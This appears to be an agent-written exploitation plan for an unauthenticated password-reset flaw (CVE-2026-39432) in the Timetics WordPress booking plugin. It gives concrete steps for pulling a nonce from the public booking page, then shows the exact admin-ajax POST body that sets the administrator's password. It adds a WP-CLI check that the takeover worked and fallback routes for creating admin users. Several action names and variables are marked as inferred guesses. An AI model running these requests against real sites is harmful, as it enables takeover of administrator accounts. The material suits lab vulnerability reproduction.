Exploitation Research Plan: CVE-2026-39432 (Timetics Missing Authorization)

1. Vulnerability Summary

The Timetics – Appointment Booking & Scheduling plugin (<= 1.0.53) contains a missing authorization vulnerability. Specifically, several administrative functions related to staff management and bookings are exposed via AJAX or REST API endpoints without sufficient capability checks (current_user_can). Because the plugin registers these actions for unauthenticated users (via wp_ajax_nopriv_*) or lacks a proper permission_callback in REST routes, an unauthenticated attacker can perform sensitive actions such as modifying staff details or passwords.

2. Attack Vector Analysis

• Endpoint: admin-ajax.php (AJAX) or /wp-json/timetics/v1/ (REST API).
• Vulnerable Action: timetics_staff_password_update (inferred based on JS chunk 0e2a61d8585862c26561.chunk.js).
• Parameter: staff_id (ID of the user/staff to modify), password (new password), and likely a nonce.
• Authentication: None Required (PR:N).
• Preconditions: The attacker must obtain a valid security nonce, which is frequently leaked to unauthenticated users via the frontend booking page.

3. Code Flow

1. Entry Point: An unauthenticated HTTP request is made to wp-admin/admin-ajax.php with action=timetics_staff_password_update.
2. Hook: The plugin likely registers add_action('wp_ajax_nopriv_timetics_staff_password_update', ...) or a similar REST route in core/REST/Staff.php (inferred).
3. Missing Check: The handler function (e.g., update_staff_password) verifies the nonce but fails to verify if the requester has administrative privileges (manage_options).
4. Sink: The function calls wp_set_password() or updates the user meta/database directly using the provided staff_id.

4. Nonce Acquisition Strategy

The plugin localizes technical parameters for its booking interface. Even unauthenticated users visiting a page with a Timetics booking form can access the nonce.

1. Identify Shortcode: The plugin uses [timetics] or [timetics_booking] (inferred) to render the booking interface.
2. Setup: Create a public page containing the shortcode.
3. Navigation: Use browser_navigate to visit this page.
4. Extraction: Use browser_eval to extract the nonce from the localized JS object.
   • Variable Name: timetics_params or timetics_admin (inferred).
   • Key: nonce.
   • Command: browser_eval("window.timetics_params?.nonce").

5. Exploitation Strategy

We will attempt to change the password of an existing staff member or administrator.

Step 1: Discover Target User ID

Identify the ID of a target user (e.g., ID 1 for the default admin).

Step 2: Obtain Nonce

As described in section 4, navigate to a page with the Timetics shortcode and extract the nonce.

Step 3: Send Malicious Request

Use the http_request tool to trigger the password update.

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Headers: Content-Type: application/x-www-form-urlencoded
• Body:

  action=timetics_staff_password_update&nonce=[NONCE]&staff_id=1&password=PwnedPassword123!
  

  (Note: If the endpoint is REST-based, the URL would be /wp-json/timetics/v1/staff/password-update with a JSON body).

6. Test Data Setup

1. Install Plugin: Ensure Timetics v1.0.53 is installed.
2. Create Target: Create a "Staff" member in Timetics (which creates a WP User) or target the existing Admin (ID 1).
3. Create Public Page:

   wp post create --post_type=page --post_title="Booking" --post_status=publish --post_content='[timetics]'
   

7. Expected Results

• Response: The server should return a JSON success message (e.g., {"success": true, "data": "Password updated successfully"}).
• Effect: The user record for staff_id=1 will have its password changed to PwnedPassword123!.

8. Verification Steps

After the exploit attempt, verify the password change using WP-CLI:

wp user check-password admin "PwnedPassword123!"

If the command returns Success: Password correct., the exploitation was successful.

9. Alternative Approaches

If timetics_staff_password_update is not the correct action name:

1. Grep for Hooks: Use grep -r "wp_ajax_nopriv" wp-content/plugins/timetics to find all unauthenticated AJAX actions.
2. Check Staff Creation: Attempt to use timetics_create_staff (from JS createStaffApi) to create a new administrative user.
3. Check REST Routes: Look for register_rest_route in the plugin source and check for routes with permission_callback set to __return_true.
   • Potential route: POST /wp-json/timetics/v1/staff/save
   • Parameters: user_id, user_pass.